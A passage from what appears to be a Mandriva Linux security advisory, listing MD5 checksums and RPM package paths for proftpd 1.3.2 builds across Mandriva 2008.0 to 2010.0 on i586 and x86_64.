26c48c47f334a8c52a571a53cd8d7fea \r\n2008.0/x86_64/proftpd-mod_ldap-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n b731b39eb4bfc5b96dd6e12a3c467538 \r\n2008.0/x86_64/proftpd-mod_load-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n ad8fe669dd5523e17b37767d3825c3be \r\n2008.0/x86_64/proftpd-mod_quotatab-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n c98d4366009169721957330419d025a0 \r\n2008.0/x86_64/proftpd-mod_quotatab_file-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 4f0c56c9fed804da72ee8fe018be572c \r\n2008.0/x86_64/proftpd-mod_quotatab_ldap-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 073c3f255943d70abba3b27f8a9f75a8 \r\n2008.0/x86_64/proftpd-mod_quotatab_radius-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n a9b1db55bd35e56346c6f304c05af434 \r\n2008.0/x86_64/proftpd-mod_quotatab_sql-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 03bc39eaeeffdb0ba04cfbc029436b29 \r\n2008.0/x86_64/proftpd-mod_radius-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n c907cecfb4869f999ee907935d0c407d \r\n2008.0/x86_64/proftpd-mod_ratio-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n dcb80800ca5dc45b4ebd1115e066e013 \r\n2008.0/x86_64/proftpd-mod_rewrite-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n f5f8c1acd6f816e4819c9a3b42ff5f02 \r\n2008.0/x86_64/proftpd-mod_shaper-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n d440490fcb18fb896fa413a5f636f18f \r\n2008.0/x86_64/proftpd-mod_site_misc-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 374c1399914e5603a2063d14041ddedd \r\n2008.0/x86_64/proftpd-mod_sql-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n ca3590fbd8cf2bb0664a2d9b0bd562e2 \r\n2008.0/x86_64/proftpd-mod_sql_mysql-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 074923354e42ee9d283e0c9a5e176454 \r\n2008.0/x86_64/proftpd-mod_sql_postgres-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n e4e79a6a2d36c074a779939fd3fb83f3 \r\n2008.0/x86_64/proftpd-mod_time-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 3cbcceedb040f65faeda847cd213d195 \r\n2008.0/x86_64/proftpd-mod_tls-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n f8caf4531b109e46c31fce0796186666 \r\n2008.0/x86_64/proftpd-mod_wrap-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n c607bac7c7a2b9ad6b45330c508f5856 
\r\n2008.0/x86_64/proftpd-mod_wrap_file-1.3.2-0.3mdv2008.0.x86_64.rpm\r\n 4108dbac0af91704eceaa8e761341c0c \r\n2008.0/x86_64/proftpd-mod_wrap_sql-1.3.2-0.3mdv2008.0.x86_64.rpm \r\n deb5bda5904c3327f58415a0b558b2e8 2008.0/SRPMS/proftpd-1.3.2-0.3mdv2008.0.src.rpm\r\n\r\n Mandriva Linux 2009.0:\r\n c4aac925334b9878eee72407eb1610f1 2009.0/i586/proftpd-1.3.2-0.4mdv2009.0.i586.rpm\r\n a3cc261ee3e0901e05f0af9dfb783d55 2009.0/i586/proftpd-devel-1.3.2-0.4mdv2009.0.i586.rpm\r\n 74947602df92c342947f2fcac9a6a7fe \r\n2009.0/i586/proftpd-mod_autohost-1.3.2-0.4mdv2009.0.i586.rpm\r\n 3f3ae650cfd8b71ae81d8581fedb8e20 2009.0/i586/proftpd-mod_ban-1.3.2-0.4mdv2009.0.i586.rpm\r\n f5e081ecb50f488bee860b412da94c0c 2009.0/i586/proftpd-mod_case-1.3.2-0.4mdv2009.0.i586.rpm\r\n 8a2680e4f72a03822c0281b6210cbef2 \r\n2009.0/i586/proftpd-mod_ctrls_admin-1.3.2-0.4mdv2009.0.i586.rpm\r\n 823e6910a8cf0665d9b980d25b5f751f 2009.0/i586/proftpd-mod_gss-1.3.2-0.4mdv2009.0.i586.rpm\r\n 0d671b7756282ee7d9f903a49b636a20 \r\n2009.0/i586/proftpd-mod_ifsession-1.3.2-0.4mdv2009.0.i586.rpm\r\n ead6fa38c3303893513ce800f32b0c39 2009.0/i586/proftpd-mod_ldap-1.3.2-0.4mdv2009.0.i586.rpm\r\n 912aa200d61549daaa207f3b671c7773 2009.0/i586/proftpd-mod_load-1.3.2-0.4mdv2009.0.i586.rpm\r\n 3c027a9b592e825283c2cd4d6d3e6b73 \r\n2009.0/i586/proftpd-mod_quotatab-1.3.2-0.4mdv2009.0.i586.rpm\r\n 768572c3b38f4e2835e682d2ba4e3aea \r\n2009.0/i586/proftpd-mod_quotatab_file-1.3.2-0.4mdv2009.0.i586.rpm\r\n e5e9aa5d3fc64a7b733635e226217e88 \r\n2009.0/i586/proftpd-mod_quotatab_ldap-1.3.2-0.4mdv2009.0.i586.rpm\r\n d661c9bf296bf4c1ddaf7bd2a1241b3b \r\n2009.0/i586/proftpd-mod_quotatab_radius-1.3.2-0.4mdv2009.0.i586.rpm\r\n 7ee532156a9252e2a220836b0c3310b7 \r\n2009.0/i586/proftpd-mod_quotatab_sql-1.3.2-0.4mdv2009.0.i586.rpm\r\n 52d487b8988ed2fb0e1e1b8ac89ab95b 2009.0/i586/proftpd-mod_radius-1.3.2-0.4mdv2009.0.i586.rpm\r\n f9ed07158e135f00f4e6f5d188d5e5be 2009.0/i586/proftpd-mod_ratio-1.3.2-0.4mdv2009.0.i586.rpm\r\n 
4a74cfccca104759f6803314d0637ff6 \r\n2009.0/i586/proftpd-mod_rewrite-1.3.2-0.4mdv2009.0.i586.rpm\r\n 54a1784bff0d683f2580e7d8efa2d364 2009.0/i586/proftpd-mod_shaper-1.3.2-0.4mdv2009.0.i586.rpm\r\n cc3487f5a092bdbd4c9017c154173442 \r\n2009.0/i586/proftpd-mod_site_misc-1.3.2-0.4mdv2009.0.i586.rpm\r\n 2ec9fd660ac78f978ec50338bd456318 2009.0/i586/proftpd-mod_sql-1.3.2-0.4mdv2009.0.i586.rpm\r\n 85718af247aec353b6df2b9bbfbeb26e \r\n2009.0/i586/proftpd-mod_sql_mysql-1.3.2-0.4mdv2009.0.i586.rpm\r\n 65ebb5ae1dd0fe2bf6e071710b315a30 \r\n2009.0/i586/proftpd-mod_sql_postgres-1.3.2-0.4mdv2009.0.i586.rpm\r\n 8d3b2b44fc29d56ee242f51ac93dc213 2009.0/i586/proftpd-mod_time-1.3.2-0.4mdv2009.0.i586.rpm\r\n 501b5b2c6059faac9683694c3384178c 2009.0/i586/proftpd-mod_tls-1.3.2-0.4mdv2009.0.i586.rpm\r\n d6c97e71ff49a2b7dd929aadaf3466e5 2009.0/i586/proftpd-mod_vroot-1.3.2-0.4mdv2009.0.i586.rpm\r\n 3ef668192f5eb8cc70f73fd57201ad2c 2009.0/i586/proftpd-mod_wrap-1.3.2-0.4mdv2009.0.i586.rpm\r\n c0ad3e7895969c4916f28dc7a3608ef6 \r\n2009.0/i586/proftpd-mod_wrap_file-1.3.2-0.4mdv2009.0.i586.rpm\r\n 6f1e9dadb14097d8bfeb7d14792c0479 \r\n2009.0/i586/proftpd-mod_wrap_sql-1.3.2-0.4mdv2009.0.i586.rpm \r\n 0f6e22b3adcf88267b8fbf15668afa0d 2009.0/SRPMS/proftpd-1.3.2-0.4mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.0/X86_64:\r\n c9b4d50d5a3ff5c013a70785fb4258d2 2009.0/x86_64/proftpd-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 3584b5ab5c8728eb27a836892e7ea0af 2009.0/x86_64/proftpd-devel-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 74067ff8d5530b1b2c5e69baf2be5375 \r\n2009.0/x86_64/proftpd-mod_autohost-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 4c7fd07706e6ab6ad7b54d81789fb6e1 \r\n2009.0/x86_64/proftpd-mod_ban-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 020fbc17086a7642aaa84f9657112c4e \r\n2009.0/x86_64/proftpd-mod_case-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 37b4bdec8986a9d8af210e06099994fc \r\n2009.0/x86_64/proftpd-mod_ctrls_admin-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n eefd827450b1f3af88337f5c08c1f6ed 
\r\n2009.0/x86_64/proftpd-mod_gss-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n b39db476e2ecd6c5fa603798d4aabccb \r\n2009.0/x86_64/proftpd-mod_ifsession-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 46523c1f5436831af6c037f008f5ba72 \r\n2009.0/x86_64/proftpd-mod_ldap-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 40330e9dfdc9b2e773e7353cb2e2f36f \r\n2009.0/x86_64/proftpd-mod_load-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 42ce8fb4c386c73333f2001d1b1ab4c1 \r\n2009.0/x86_64/proftpd-mod_quotatab-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n fd0dd14ae0041bc910f66d93480f8060 \r\n2009.0/x86_64/proftpd-mod_quotatab_file-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 9ba237bcd93e6aa97f55473b0d9ffc78 \r\n2009.0/x86_64/proftpd-mod_quotatab_ldap-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 9d4b084261a47bc27d51ac4457be39cd \r\n2009.0/x86_64/proftpd-mod_quotatab_radius-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n ba1cc158630d79ea09c3ee1398015957 \r\n2009.0/x86_64/proftpd-mod_quotatab_sql-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 71cf8f4cb0bb8494acdfb232525a3f8e \r\n2009.0/x86_64/proftpd-mod_radius-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 2ca1189c3e366445ae3d5fe2763c0ca1 \r\n2009.0/x86_64/proftpd-mod_ratio-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 3db0175d5fbe98e67abe906f6c2fb607 \r\n2009.0/x86_64/proftpd-mod_rewrite-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 499aa6ad8fcf46c343bd9f20e102e47b \r\n2009.0/x86_64/proftpd-mod_shaper-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 4e1fb4f9fea8e037076ce3b95af0a920 \r\n2009.0/x86_64/proftpd-mod_site_misc-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 5b99600fa7545b5823f0fa0ddb7a38c5 \r\n2009.0/x86_64/proftpd-mod_sql-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 80ee086eac0082c0dda122535d72db1d \r\n2009.0/x86_64/proftpd-mod_sql_mysql-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 328de69a89a3f77ac02bc6be05a776a1 \r\n2009.0/x86_64/proftpd-mod_sql_postgres-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 4105f8f544588f6b13a70aad0e6f444c \r\n2009.0/x86_64/proftpd-mod_time-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n b9db4c4adc4c3054b37235f5ed7795d7 \r\n2009.0/x86_64/proftpd-mod_tls-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 
62a356a3a857809a1a376dd07ff353d2 \r\n2009.0/x86_64/proftpd-mod_vroot-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 0c4cc4ad51deef7f83bace6cef2185bb \r\n2009.0/x86_64/proftpd-mod_wrap-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 6699773ed14dc1c92fc57f2db8102f9b \r\n2009.0/x86_64/proftpd-mod_wrap_file-1.3.2-0.4mdv2009.0.x86_64.rpm\r\n 2e297598198d71f64e81c8a658c989e1 \r\n2009.0/x86_64/proftpd-mod_wrap_sql-1.3.2-0.4mdv2009.0.x86_64.rpm \r\n 0f6e22b3adcf88267b8fbf15668afa0d 2009.0/SRPMS/proftpd-1.3.2-0.4mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.1:\r\n aed71239960bf7aba5f7e757cd19debf 2009.1/i586/proftpd-1.3.2-4.3mdv2009.1.i586.rpm\r\n d49f746c3afc297f28b14f3e0648c257 2009.1/i586/proftpd-devel-1.3.2-4.3mdv2009.1.i586.rpm\r\n 4d9b09d69a738fcbc889ba543ca88e34 \r\n2009.1/i586/proftpd-mod_autohost-1.3.2-4.3mdv2009.1.i586.rpm\r\n b8ef88b8ee4a385fbce227cce1fe3b5c 2009.1/i586/proftpd-mod_ban-1.3.2-4.3mdv2009.1.i586.rpm\r\n 86f0568b160f984cb5da088196079cb4 2009.1/i586/proftpd-mod_case-1.3.2-4.3mdv2009.1.i586.rpm\r\n 4f90e334ee571f25a7dd310cb4c9b0a6 \r\n2009.1/i586/proftpd-mod_ctrls_admin-1.3.2-4.3mdv2009.1.i586.rpm\r\n a5734ea5aa1b96c8f8245810ac837d94 2009.1/i586/proftpd-mod_gss-1.3.2-4.3mdv2009.1.i586.rpm\r\n a8908a6f38c06080079f21616260b5b2 \r\n2009.1/i586/proftpd-mod_ifsession-1.3.2-4.3mdv2009.1.i586.rpm\r\n c88b0e334beb4fb0dd13861cc58f3c0a 2009.1/i586/proftpd-mod_ldap-1.3.2-4.3mdv2009.1.i586.rpm\r\n a7687eb04f0c0bb2c3cccd7e87047b38 2009.1/i586/proftpd-mod_load-1.3.2-4.3mdv2009.1.i586.rpm\r\n 94167be7342868855c34e8a733d6179c \r\n2009.1/i586/proftpd-mod_quotatab-1.3.2-4.3mdv2009.1.i586.rpm\r\n 3d4483dd721b1531443c628bcb51bb87 \r\n2009.1/i586/proftpd-mod_quotatab_file-1.3.2-4.3mdv2009.1.i586.rpm\r\n 5def57fd05b0b6d264c0ff06be3c452e \r\n2009.1/i586/proftpd-mod_quotatab_ldap-1.3.2-4.3mdv2009.1.i586.rpm\r\n be1a11751a260b9485706d025f7b790a \r\n2009.1/i586/proftpd-mod_quotatab_radius-1.3.2-4.3mdv2009.1.i586.rpm\r\n 6bccd6b2703e063a1f868c281af2fb14 
\r\n2009.1/i586/proftpd-mod_quotatab_sql-1.3.2-4.3mdv2009.1.i586.rpm\r\n caf0a181179c7e7b0df438145993c260 2009.1/i586/proftpd-mod_radius-1.3.2-4.3mdv2009.1.i586.rpm\r\n 4bfc301f665459020fd01d241418da10 2009.1/i586/proftpd-mod_ratio-1.3.2-4.3mdv2009.1.i586.rpm\r\n e203d54440dc6c63cfa280f4a1645477 \r\n2009.1/i586/proftpd-mod_rewrite-1.3.2-4.3mdv2009.1.i586.rpm\r\n 06bcb89523dcb2834f36363eb951508d 2009.1/i586/proftpd-mod_sftp-1.3.2-4.3mdv2009.1.i586.rpm\r\n 5ad0cdf4611e919be1e40d9dbebf23d0 2009.1/i586/proftpd-mod_shaper-1.3.2-4.3mdv2009.1.i586.rpm\r\n 9510932406f1d51532c0f4628656ae84 \r\n2009.1/i586/proftpd-mod_site_misc-1.3.2-4.3mdv2009.1.i586.rpm\r\n ebf6f6220d9cab6c5b5a288bc956fdd0 2009.1/i586/proftpd-mod_sql-1.3.2-4.3mdv2009.1.i586.rpm\r\n 3aafc84edd0adbcfecb3b6ea02a20bf1 \r\n2009.1/i586/proftpd-mod_sql_mysql-1.3.2-4.3mdv2009.1.i586.rpm\r\n c912e99c6651730738188eb67b5a89e1 \r\n2009.1/i586/proftpd-mod_sql_postgres-1.3.2-4.3mdv2009.1.i586.rpm\r\n 9589a010aed9f23e72ec6db855b184f9 2009.1/i586/proftpd-mod_time-1.3.2-4.3mdv2009.1.i586.rpm\r\n 1eeeda75990735116ab07c674fe2c623 2009.1/i586/proftpd-mod_tls-1.3.2-4.3mdv2009.1.i586.rpm\r\n fce42746d17f5b11c97319591bb9a88f 2009.1/i586/proftpd-mod_vroot-1.3.2-4.3mdv2009.1.i586.rpm\r\n c4b1f7509fedc9b88646fb70adc12b45 2009.1/i586/proftpd-mod_wrap-1.3.2-4.3mdv2009.1.i586.rpm\r\n 4a2b73b02a9c0dcf4e63323d350fa95c \r\n2009.1/i586/proftpd-mod_wrap_file-1.3.2-4.3mdv2009.1.i586.rpm\r\n fb3df7fa8c2c538dd8c613fafc41f1f5 \r\n2009.1/i586/proftpd-mod_wrap_sql-1.3.2-4.3mdv2009.1.i586.rpm \r\n c7a3b4ac2e75e9dfe3912e73bb272fa9 2009.1/SRPMS/proftpd-1.3.2-4.3mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2009.1/X86_64:\r\n a6b2830005df037307afb5b825511861 2009.1/x86_64/proftpd-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n af595e88d9ba8dc6cbcacf27ca1dbcc2 2009.1/x86_64/proftpd-devel-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 9735071e01d2392cd1f59d3e02395d63 \r\n2009.1/x86_64/proftpd-mod_autohost-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 916358bef91a16077806c86de9d1efd9 
\r\n2009.1/x86_64/proftpd-mod_ban-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n d53d77569fe4ce057db0a35b03fa0ca7 \r\n2009.1/x86_64/proftpd-mod_case-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n f56dee8296e1593141844dc73ad3df37 \r\n2009.1/x86_64/proftpd-mod_ctrls_admin-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 37350fff9604f97a4e1c26b32be76c8e \r\n2009.1/x86_64/proftpd-mod_gss-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 7ba0e7dcc812128665960b490e4b3c1d \r\n2009.1/x86_64/proftpd-mod_ifsession-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 907665b726396f366b60aed937978731 \r\n2009.1/x86_64/proftpd-mod_ldap-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 4beaa5f007e4c39c26dc16832b57951f \r\n2009.1/x86_64/proftpd-mod_load-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n b420a6fd444b76842810fd9b82d11792 \r\n2009.1/x86_64/proftpd-mod_quotatab-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 919fc5751a1aded6c19f8fadfbb5847b \r\n2009.1/x86_64/proftpd-mod_quotatab_file-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n dbce5c8d0805f9af94c19fb4087084db \r\n2009.1/x86_64/proftpd-mod_quotatab_ldap-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 00fda6395cf2653bd5db8dc9baef0314 \r\n2009.1/x86_64/proftpd-mod_quotatab_radius-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n d575efa232443920270251bf28ec8d87 \r\n2009.1/x86_64/proftpd-mod_quotatab_sql-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 6ca6948f914c39bca76d3e0b2a0e0491 \r\n2009.1/x86_64/proftpd-mod_radius-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n e60d42f42db99fdc70a5c559a8798f32 \r\n2009.1/x86_64/proftpd-mod_ratio-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 500e7d59b18e03ce2d1d646faec35df0 \r\n2009.1/x86_64/proftpd-mod_rewrite-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n d42351a95a97e208c26a73500e586964 \r\n2009.1/x86_64/proftpd-mod_sftp-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 2b57a3244903b09e30dd501e4e23bddc \r\n2009.1/x86_64/proftpd-mod_shaper-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n bc1c1edc3ac9df62ad6ffed6f177031b \r\n2009.1/x86_64/proftpd-mod_site_misc-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n cf2362de6b2c03fcfdab454abc6250d6 \r\n2009.1/x86_64/proftpd-mod_sql-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 
11579dca45c5262109f6dd5eeb102248 \r\n2009.1/x86_64/proftpd-mod_sql_mysql-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 5e042bbd8d138e0384415ea1f7d8c987 \r\n2009.1/x86_64/proftpd-mod_sql_postgres-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n bb8d509fa422b044fa7c0a54f772e828 \r\n2009.1/x86_64/proftpd-mod_time-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n f0ac0f2b95b20a6d94563bb3b795b631 \r\n2009.1/x86_64/proftpd-mod_tls-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 2d84e91e39cdb70dfa99f506ea1c149f \r\n2009.1/x86_64/proftpd-mod_vroot-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n 541d2cc751afa34051d9b7e0ffc77867 \r\n2009.1/x86_64/proftpd-mod_wrap-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n a031f41be3c2bbf19b2ad87aa723afec \r\n2009.1/x86_64/proftpd-mod_wrap_file-1.3.2-4.3mdv2009.1.x86_64.rpm\r\n b9d6b63bd48b9ea2fb08dbf1f53cc452 \r\n2009.1/x86_64/proftpd-mod_wrap_sql-1.3.2-4.3mdv2009.1.x86_64.rpm \r\n c7a3b4ac2e75e9dfe3912e73bb272fa9 2009.1/SRPMS/proftpd-1.3.2-4.3mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2010.0:\r\n dd848a74a6324fe3e4887ffd8f7a0947 2010.0/i586/proftpd-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 46541f77ec1d551384434303c9d771fd 2010.0/i586/proftpd-devel-1.3.2b-1.2mdv2010.0.i586.rpm\r\n affa6d8649ff49826359525e5e3c3bc3 \r\n2010.0/i586/proftpd-mod_autohost-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 34ab986bd1bd58d64a76474dcce4024d 2010.0/i586/proftpd-mod_ban-1.3.2b-1.2mdv2010.0.i586.rpm\r\n c05796ea6a65e0254e1c2a59d0cde26a 2010.0/i586/proftpd-mod_case-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 2fde4f8529ad42e6543dc394eb37a6a8 \r\n2010.0/i586/proftpd-mod_ctrls_admin-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 2bea60920c8e153bd1a06d66c116b385 2010.0/i586/proftpd-mod_gss-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 7c28ba2a2ee6264b0f1e904946027ed3 \r\n2010.0/i586/proftpd-mod_ifsession-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 113fb3cdd9ca077d0fad2bf161eb33a1 2010.0/i586/proftpd-mod_ldap-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 218d363874a9aaab6110a7a71f27c75e 2010.0/i586/proftpd-mod_load-1.3.2b-1.2mdv2010.0.i586.rpm\r\n a14950554085fb3ac61e1f4e130ef106 
\r\n2010.0/i586/proftpd-mod_quotatab-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 8869ae8cbda130c213eac45431574ec6 \r\n2010.0/i586/proftpd-mod_quotatab_file-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 18a141a036989e9d2ba2b721ea3d96b9 \r\n2010.0/i586/proftpd-mod_quotatab_ldap-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 9c375770f082cd7f50f57ed3b8cfe18e \r\n2010.0/i586/proftpd-mod_quotatab_radius-1.3.2b-1.2mdv2010.0.i586.rpm\r\n ee252f0c88ee6095f8bc4b274524b4a5 \r\n2010.0/i586/proftpd-mod_quotatab_sql-1.3.2b-1.2mdv2010.0.i586.rpm\r\n fd8a104edd647e59433b0c2c1e442cbb \r\n2010.0/i586/proftpd-mod_radius-1.3.2b-1.2mdv2010.0.i586.rpm\r\n f8ba2195c779a419dd7d98265b9adf72 2010.0/i586/proftpd-mod_ratio-1.3.2b-1.2mdv2010.0.i586.rpm\r\n cb326955ce385af35b2d47a536ea295a \r\n2010.0/i586/proftpd-mod_rewrite-1.3.2b-1.2mdv2010.0.i586.rpm\r\n dac761ac2c329edb8063ef4042623b1c 2010.0/i586/proftpd-mod_sftp-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 05b65a6650d0e403a6ca311d0738e1b0 \r\n2010.0/i586/proftpd-mod_shaper-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 64bb01402af73cfae14e3d817ec0054b \r\n2010.0/i586/proftpd-mod_site_misc-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 5fa7191a640c5a7ce6e85cd507c4f2e5 2010.0/i586/proftpd-mod_sql-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 652d750f6cab24c68a1befab39687f76 \r\n2010.0/i586/proftpd-mod_sql_mysql-1.3.2b-1.2mdv2010.0.i586.rpm\r\n aad34f7718fdfb07e0094389527916c0 \r\n2010.0/i586/proftpd-mod_sql_postgres-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 80515fe8363c5cce8b5a612ca212e8ee 2010.0/i586/proftpd-mod_time-1.3.2b-1.2mdv2010.0.i586.rpm\r\n f7ea09c7b36a478d23834fb682383306 2010.0/i586/proftpd-mod_tls-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 36de8f7fda7d9f1337db55f214b07c00 2010.0/i586/proftpd-mod_vroot-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 275e5015b8ddd2a9acb0df46e8916bb1 2010.0/i586/proftpd-mod_wrap-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 85997703010f8bb600924a1fbe8a12a5 \r\n2010.0/i586/proftpd-mod_wrap_file-1.3.2b-1.2mdv2010.0.i586.rpm\r\n 9f56cf0f821f549eed1fd3a171de5369 \r\n2010.0/i586/proftpd-mod_wrap_sql-1.3.2b-1.2mdv2010.0.i586.rpm \r\n 
58436f06fb26948305063a45e78bcbd7 2010.0/SRPMS/proftpd-1.3.2b-1.2mdv2010.0.src.rpm\r\n\r\n Mandriva Linux 2010.0/X86_64:\r\n f1c0704dbc0a1a60e14d3fb9c4a99be6 2010.0/x86_64/proftpd-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n ab73990c06fa7c5413b16a6b5d7a573c 2010.0/x86_64/proftpd-devel-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 643770bc38a29e4ebd038e7f2e69aa82 \r\n2010.0/x86_64/proftpd-mod_autohost-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 0fd5d618b8b25caace31730e91b6b89b \r\n2010.0/x86_64/proftpd-mod_ban-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 84c0d0270036098e030c7894b8941b18 \r\n2010.0/x86_64/proftpd-mod_case-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 172d49b23d21a0634a8706455b0b6c2f \r\n2010.0/x86_64/proftpd-mod_ctrls_admin-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 054138333a930839693096e41008d3d2 \r\n2010.0/x86_64/proftpd-mod_gss-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 29743fe4a50c4f203bcd36959bcda682 \r\n2010.0/x86_64/proftpd-mod_ifsession-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 7d3279d6b591d646b41239ec3100043a \r\n2010.0/x86_64/proftpd-mod_ldap-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 3d511ac9140ca7ef3fa60baed95afd8f \r\n2010.0/x86_64/proftpd-mod_load-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n f6e31dda4763bb5025805600039da742 \r\n2010.0/x86_64/proftpd-mod_quotatab-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 14064603c7cd05a8fb795a5001170128 \r\n2010.0/x86_64/proftpd-mod_quotatab_file-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 3d50ae2c6d617ed9e44b360a049364a4 \r\n2010.0/x86_64/proftpd-mod_quotatab_ldap-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 2ac18660eaf6d93a86acbf8f95b7c875 \r\n2010.0/x86_64/proftpd-mod_quotatab_radius-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 4336bcc4b91e4be399128ccf9f951147 \r\n2010.0/x86_64/proftpd-mod_quotatab_sql-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 152eeb85deb93868890388677b0682f8 \r\n2010.0/x86_64/proftpd-mod_radius-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 572f38135ba48c45ec34d3f745d847ca \r\n2010.0/x86_64/proftpd-mod_ratio-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 12b4d2342f57f486f9859b58bd949006 
\r\n2010.0/x86_64/proftpd-mod_rewrite-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 6ed0182708abfde9a07018edef86f50e \r\n2010.0/x86_64/proftpd-mod_sftp-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 45df194fc6aa7b0399bd671b0075a8c8 \r\n2010.0/x86_64/proftpd-mod_shaper-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 566d8a8d28ac8e3a8f17144b6264e150 \r\n2010.0/x86_64/proftpd-mod_site_misc-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 3c1c7f67320e45cc2abfac83882ebd7c \r\n2010.0/x86_64/proftpd-mod_sql-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n ee6e76d8c5c9dee971e718e06f3289e4 \r\n2010.0/x86_64/proftpd-mod_sql_mysql-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n b4a54dd69f873cd05bbf51f17def15fc 